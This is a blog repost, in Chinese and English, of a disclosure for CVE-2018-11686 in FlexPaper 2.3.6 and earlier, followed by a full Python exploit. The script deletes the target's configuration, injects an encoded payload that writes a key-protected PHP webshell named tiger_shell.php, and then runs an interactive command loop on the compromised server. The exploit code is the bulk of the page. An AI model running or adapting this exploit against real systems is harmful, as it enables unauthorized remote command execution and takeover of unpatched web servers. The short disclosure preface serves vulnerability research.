zoukankan      html  css  js  c++  java
  • FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本

    FlexPaper (https://www.flowpaper.com)

      是一个开源项目,遵循GPL协议,在互联网上非常流行。它为web客户端、移动设备和平板设备提供文档的查看功能。至少在2014年之前,维基解密一直在广泛的使用该组件,漏洞产生的原因是受到一个XSS漏洞补丁的影响。

      Red Timmy Sec在FlexPaper上发现了一个远程命令执行漏洞。供应商立即联系并注册了CVE 2018-11686。尽管这个项目的2.3.7版本已经发布了一个补丁,但是这个漏洞本身直到现在仍然没有被公开。

      关于这个漏洞的详细情况请看:https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

      文末附Exp.

    ----------------

    FlexPaper <=2.3.6 Remote Command Execution

    FlexPaper (https://www.flowpaper.com) is an open source project, released under GPL license, quite widespread over the internet. It provides document viewing functionalities to web clients, mobile and tablet devices. At least until 2014 the component has been actively used by WikiLeaks, when it was discovered to be affected by a XSS vulnerability subsequently patched.

    Around one year ago Red Timmy Sec discovered a Remote Command Execution vulnerability on FlexPaper. The vendor was immediately contacted and a CVE registered (2018-11686). However the vulnerability itself has remained undisclosed until now, regardless the fact that a patch has been issued with the release 2.3.7 of the project.

    Full analysis of this vulnerability can be found here: https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

    ----------------

    Exp(Exploit):

     1 #!/usr/bin/env python
     2 #Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
     3 #Date: March 2019
     4 #Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
     5 #Vendor Homepage: https://flowpaper.com/download/
     6 #Version: <= 2.3.6
     7 #Tested on: Linux/Unix
     8 #CVE : CVE-2018-11686
     9 #Disclamer: This exploit is for educational purpose only
    10 #More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
    11 
    12 import sys
    13 import requests
    14 import readline
    15 import urllib2
    16 import ssl
    17 
    18 try:
    19         url = sys.argv[1]
    20 except:
    21         print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
    22         print sys.exit(1)
    23 
    24 print """
    25          __                  __                           
    26    _____/ /_  ________  ____/ ____  ____ _____  ___  _____
    27   / ___/ __ / ___/ _ / __  / __ / __ `/ __ / _ / ___/
    28  (__  / / / / /  /  __/ /_/ / /_/ / /_/ / /_/ /  __/ /    
    29 /____/_/ /_/_/   \___/\__,_/ .___/\__,_/ .___/\___/_/     
    30                           /_/         /_/                 
    31 """
    32 
    33 print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
    34 print "[*] Attacking %s" %url
    35 print "[*] Deleting target configuration file"
    36 payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
    37 url1 = url+"/php/change_config.php"
    38 r1 = requests.post(url1, data=payload)
    39 rx = requests.post(url1, data=payload) #resend
    40 shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
    41 
    42 print "[*] Uploading webshell.."
    43 url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
    44 r2 = requests.get(url2)
    45 print "[*] Checking if shell is uploaded successfully"
    46 
    47 webshell = url+ '/php/tiger_shell.php'
    48 
    49 check_shell = requests.get(webshell)
    50 if check_shell.status_code == 200:
    51         print "[*] We got a shell"
    52 else:
    53         print "[-] Exploit failed, die"
    54         sys.exit(2)
    55 ctx = ssl.create_default_context()
    56 ctx.check_hostname = False
    57 ctx.verify_mode = ssl.CERT_NONE
    58 while True:
    59         cmd = raw_input("enter cmd>>")
    60         cmd = cmd.strip()
    61         cmd = cmd.encode('base64').strip().replace("
    ","")
    62         link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
    63         #print link
    64         try:
    65                 response = urllib2.urlopen(link, context=ctx)
    66                 page = response.read()
    67                 print page
    68         except Exception as exc:
    69                 print exc
    70                 continue
  • 相关阅读:
    随笔记:目录已在,但是导入时报ModuleNotFoundError: No module named 'config'
    随笔记:fixture的使用
    python随笔:os.path中的realpathdirnamejoin的学习
    01-移动营销设计-认识H5与广告
    Java web开发 01 入门知识
    Java 12网络编程
    java09 面向对象,封装,继承,多态
    java08 数组与集合
    java07 数组 与 开发工具IntelliJ IDEA 安装 汉化
    java06 顺序结构 选择判断结构 与循环语句
  • 原文地址:https://www.cnblogs.com/iAmSoScArEd/p/10512720.html
Copyright © 2011-2022 走看看